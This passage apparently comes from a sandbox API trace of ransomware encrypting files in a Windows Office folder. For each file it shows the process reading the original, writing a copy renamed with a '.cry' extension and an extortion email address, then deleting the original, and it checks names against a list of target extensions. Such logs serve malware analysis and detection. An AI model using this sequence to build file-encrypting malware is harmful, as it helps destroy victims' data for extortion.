lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0040.202] GetLastError () returned 0x0 [0040.202] ReadFile (in: hFile=0x1b8, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x11644, lpOverlapped=0x0) returned 1 [0040.229] WriteFile (in: hFile=0x1c4, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0x11650, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0x11650, lpOverlapped=0x0) returned 1 [0040.231] ReadFile (in: hFile=0x1b8, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0040.231] WriteFile (in: hFile=0x1c4, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xe2, lpOverlapped=0x0) returned 1 [0040.231] SetEndOfFile (hFile=0x1c4) returned 1 [0040.231] CloseHandle (hObject=0x1c4) returned 1 [0040.232] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.232] SetEndOfFile (hFile=0x1b8) returned 1 [0040.233] CloseHandle (hObject=0x1b8) returned 1 [0040.233] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0040.233] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\oct.chm")) returned 1 [0040.234] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM") returned 100 [0040.234] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM") returned 100 [0040.234] lstrlenW (lpString=".doc") returned 4 [0040.234] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0040.234] lstrlenW (lpString=".docx") returned 5 [0040.234] lstrcmpiW (lpString1=".docx", lpString2="T.CHM") returned -1 [0040.234] lstrlenW (lpString=".pdf") returned 4 [0040.234] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0040.234] lstrlenW (lpString=".xls") returned 4 [0040.234] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0040.234] lstrlenW (lpString=".xlsx") returned 5 [0040.234] lstrcmpiW (lpString1=".xlsx", lpString2="T.CHM") returned -1 [0040.234] lstrlenW (lpString=".ppt") returned 4 [0040.234] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0040.234] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM") returned 100 [0040.234] lstrlenW (lpString=".zip") returned 4 [0040.234] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0040.234] lstrlenW (lpString=".rar") returned 4 [0040.234] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0040.234] lstrlenW (lpString=".bz2") returned 4 [0040.234] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0040.234] lstrlenW (lpString=".7z") returned 3 [0040.234] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0040.234] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM") returned 100 [0040.234] lstrlenW (lpString=".dbf") returned 4 [0040.234] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0040.234] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM") returned 100 [0040.234] lstrlenW (lpString=".1cd") returned 4 [0040.234] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0040.234] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM") returned 100 [0040.234] lstrlenW (lpString=".jpg") returned 4 [0040.234] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0040.234] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM") returned 100 [0040.234] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM") returned 100 [0040.234] lstrlenW (lpString=".doc") returned 4 [0040.235] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0040.235] lstrlenW (lpString=".docx") returned 5 [0040.235] lstrcmpiW (lpString1=".docx", lpString2="T.CHM") returned -1 [0040.235] lstrlenW (lpString=".pdf") returned 4 [0040.235] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0040.235] lstrlenW (lpString=".xls") returned 4 [0040.235] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0040.235] lstrlenW (lpString=".xlsx") returned 5 [0040.235] lstrcmpiW (lpString1=".xlsx", lpString2="T.CHM") returned -1 [0040.235] lstrlenW (lpString=".ppt") returned 4 [0040.235] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0040.235] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM") returned 100 [0040.235] lstrlenW (lpString=".zip") returned 4 [0040.235] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0040.235] lstrlenW (lpString=".rar") returned 4 [0040.235] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0040.235] lstrlenW (lpString=".bz2") returned 4 [0040.235] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0040.235] lstrlenW (lpString=".7z") returned 3 [0040.235] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0040.235] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM") returned 100 [0040.235] lstrlenW (lpString=".dbf") returned 4 [0040.235] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0040.235] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM") returned 100 [0040.235] lstrlenW (lpString=".1cd") returned 4 [0040.235] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0040.235] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM") returned 100 [0040.235] lstrlenW (lpString=".jpg") returned 4 [0040.235] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0040.235] lstrcmpiW (lpString1=".XML", lpString2=".cry") returned 1 [0040.235] lstrlenW (lpString="OfficeMUISet.XML") returned 16 [0040.235] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemuiset.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0040.236] GetFileSizeEx (in: hFile=0x1b8, lpFileSize=0x225ff1c | out: lpFileSize=0x225ff1c*=819) returned 1 [0040.236] CloseHandle (hObject=0x1b8) returned 1 [0040.236] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemuiset.xml")) returned 0x20 [0040.236] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemuiset.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0040.236] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemuiset.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0040.236] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.236] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.236] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemuiset.xml.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0040.236] GetLastError () returned 0x0 [0040.236] ReadFile (in: hFile=0x1b8, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x333, lpOverlapped=0x0) returned 1 [0040.245] WriteFile (in: hFile=0x1c4, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0x340, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0x340, lpOverlapped=0x0) returned 1 [0040.246] ReadFile (in: hFile=0x1b8, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0040.246] WriteFile (in: hFile=0x1c4, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xf4, lpOverlapped=0x0) returned 1 [0040.246] SetEndOfFile (hFile=0x1c4) returned 1 [0040.246] CloseHandle (hObject=0x1c4) returned 1 [0040.247] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.247] SetEndOfFile (hFile=0x1b8) returned 1 [0040.248] CloseHandle (hObject=0x1b8) returned 1 [0040.248] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0040.248] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemuiset.xml")) returned 1 [0040.248] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML") returned 109 [0040.248] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML") returned 109 [0040.248] lstrlenW (lpString=".doc") returned 4 [0040.248] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.248] lstrlenW (lpString=".docx") returned 5 [0040.248] lstrcmpiW (lpString1=".docx", lpString2="t.XML") returned -1 [0040.248] lstrlenW (lpString=".pdf") returned 4 [0040.248] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.248] lstrlenW (lpString=".xls") returned 4 [0040.248] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.249] lstrlenW (lpString=".xlsx") returned 5 [0040.249] lstrcmpiW (lpString1=".xlsx", lpString2="t.XML") returned -1 [0040.249] lstrlenW (lpString=".ppt") returned 4 [0040.249] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.249] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML") returned 109 [0040.249] lstrlenW (lpString=".zip") returned 4 [0040.249] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.249] lstrlenW (lpString=".rar") returned 4 [0040.249] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.249] lstrlenW (lpString=".bz2") returned 4 [0040.249] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.249] lstrlenW (lpString=".7z") returned 3 [0040.249] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.249] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML") returned 109 [0040.249] lstrlenW (lpString=".dbf") returned 4 [0040.249] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.249] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML") returned 109 [0040.249] lstrlenW (lpString=".1cd") returned 4 [0040.249] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.249] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML") returned 109 [0040.249] lstrlenW (lpString=".jpg") returned 4 [0040.249] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.249] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML") returned 109 [0040.249] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML") returned 109 [0040.249] lstrlenW (lpString=".doc") returned 4 [0040.249] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.249] lstrlenW (lpString=".docx") returned 5 [0040.249] lstrcmpiW (lpString1=".docx", lpString2="t.XML") returned -1 [0040.249] lstrlenW (lpString=".pdf") returned 4 [0040.249] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.249] lstrlenW (lpString=".xls") returned 4 [0040.249] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.249] lstrlenW (lpString=".xlsx") returned 5 [0040.249] lstrcmpiW (lpString1=".xlsx", lpString2="t.XML") returned -1 [0040.249] lstrlenW (lpString=".ppt") returned 4 [0040.249] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.249] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML") returned 109 [0040.250] lstrlenW (lpString=".zip") returned 4 [0040.250] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.250] lstrlenW (lpString=".rar") returned 4 [0040.250] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.250] lstrlenW (lpString=".bz2") returned 4 [0040.250] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.250] lstrlenW (lpString=".7z") returned 3 [0040.250] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.250] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML") returned 109 [0040.250] lstrlenW (lpString=".dbf") returned 4 [0040.250] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.250] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML") returned 109 [0040.250] lstrlenW (lpString=".1cd") returned 4 [0040.250] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.250] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML") returned 109 [0040.250] lstrlenW (lpString=".jpg") returned 4 [0040.250] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.250] lstrcmpiW (lpString1=".CHM", lpString2=".cry") returned -1 [0040.250] lstrlenW (lpString="PSS10O.CHM") returned 10 [0040.250] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\pss10o.chm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0040.250] GetFileSizeEx (in: hFile=0x1b8, lpFileSize=0x225ff1c | out: lpFileSize=0x225ff1c*=26929) returned 1 [0040.250] CloseHandle (hObject=0x1b8) returned 1 [0040.250] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\pss10o.chm")) returned 0x20 [0040.251] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\pss10o.chm.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0040.251] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\pss10o.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0040.251] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.251] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.251] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\pss10o.chm.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0040.251] GetLastError () returned 0x0 [0040.251] ReadFile (in: hFile=0x1b8, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x6931, lpOverlapped=0x0) returned 1 [0040.256] WriteFile (in: hFile=0x1c4, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0x6940, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0x6940, lpOverlapped=0x0) returned 1 [0040.257] ReadFile (in: hFile=0x1b8, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0040.257] WriteFile (in: hFile=0x1c4, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xe8, lpOverlapped=0x0) returned 1 [0040.258] SetEndOfFile (hFile=0x1c4) returned 1 [0040.258] CloseHandle (hObject=0x1c4) returned 1 [0040.258] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.258] SetEndOfFile (hFile=0x1b8) returned 1 [0040.259] CloseHandle (hObject=0x1b8) returned 1 [0040.259] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0040.260] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\pss10o.chm")) returned 1 [0040.260] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM") returned 103 [0040.260] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM") returned 103 [0040.260] lstrlenW (lpString=".doc") returned 4 [0040.260] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0040.260] lstrlenW (lpString=".docx") returned 5 [0040.260] lstrcmpiW (lpString1=".docx", lpString2="O.CHM") returned -1 [0040.260] lstrlenW (lpString=".pdf") returned 4 [0040.260] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0040.260] lstrlenW (lpString=".xls") returned 4 [0040.260] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0040.260] lstrlenW (lpString=".xlsx") returned 5 [0040.260] lstrcmpiW (lpString1=".xlsx", lpString2="O.CHM") returned -1 [0040.260] lstrlenW (lpString=".ppt") returned 4 [0040.260] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0040.260] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM") returned 103 [0040.260] lstrlenW (lpString=".zip") returned 4 [0040.260] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0040.260] lstrlenW (lpString=".rar") returned 4 [0040.260] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0040.260] lstrlenW (lpString=".bz2") returned 4 [0040.260] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0040.260] lstrlenW (lpString=".7z") returned 3 [0040.260] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0040.261] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM") returned 103 [0040.261] lstrlenW (lpString=".dbf") returned 4 [0040.261] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0040.261] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM") returned 103 [0040.261] lstrlenW (lpString=".1cd") returned 4 [0040.261] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0040.261] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM") returned 103 [0040.261] lstrlenW (lpString=".jpg") returned 4 [0040.261] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0040.261] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM") returned 103 [0040.261] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM") returned 103 [0040.261] lstrlenW (lpString=".doc") returned 4 [0040.261] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0040.261] lstrlenW (lpString=".docx") returned 5 [0040.261] lstrcmpiW (lpString1=".docx", lpString2="O.CHM") returned -1 [0040.261] lstrlenW (lpString=".pdf") returned 4 [0040.261] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0040.261] lstrlenW (lpString=".xls") returned 4 [0040.261] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0040.261] lstrlenW (lpString=".xlsx") returned 5 [0040.261] lstrcmpiW (lpString1=".xlsx", lpString2="O.CHM") returned -1 [0040.261] lstrlenW (lpString=".ppt") returned 4 [0040.261] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0040.261] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM") returned 103 [0040.261] lstrlenW (lpString=".zip") returned 4 [0040.261] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0040.261] lstrlenW (lpString=".rar") returned 4 [0040.261] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0040.261] lstrlenW (lpString=".bz2") returned 4 [0040.261] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0040.261] lstrlenW (lpString=".7z") returned 3 [0040.261] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0040.262] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM") returned 103 [0040.262] lstrlenW (lpString=".dbf") returned 4 [0040.262] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0040.262] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM") returned 103 [0040.262] lstrlenW (lpString=".1cd") returned 4 [0040.262] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0040.262] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM") returned 103 [0040.262] lstrlenW (lpString=".jpg") returned 4 [0040.262] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0040.262] lstrcmpiW (lpString1=".CHM", lpString2=".cry") returned -1 [0040.262] lstrlenW (lpString="PSS10R.CHM") returned 10 [0040.262] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\pss10r.chm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0040.263] GetFileSizeEx (in: hFile=0x1b8, lpFileSize=0x225ff1c | out: lpFileSize=0x225ff1c*=27195) returned 1 [0040.263] CloseHandle (hObject=0x1b8) returned 1 [0040.263] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\pss10r.chm")) returned 0x20 [0040.263] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup 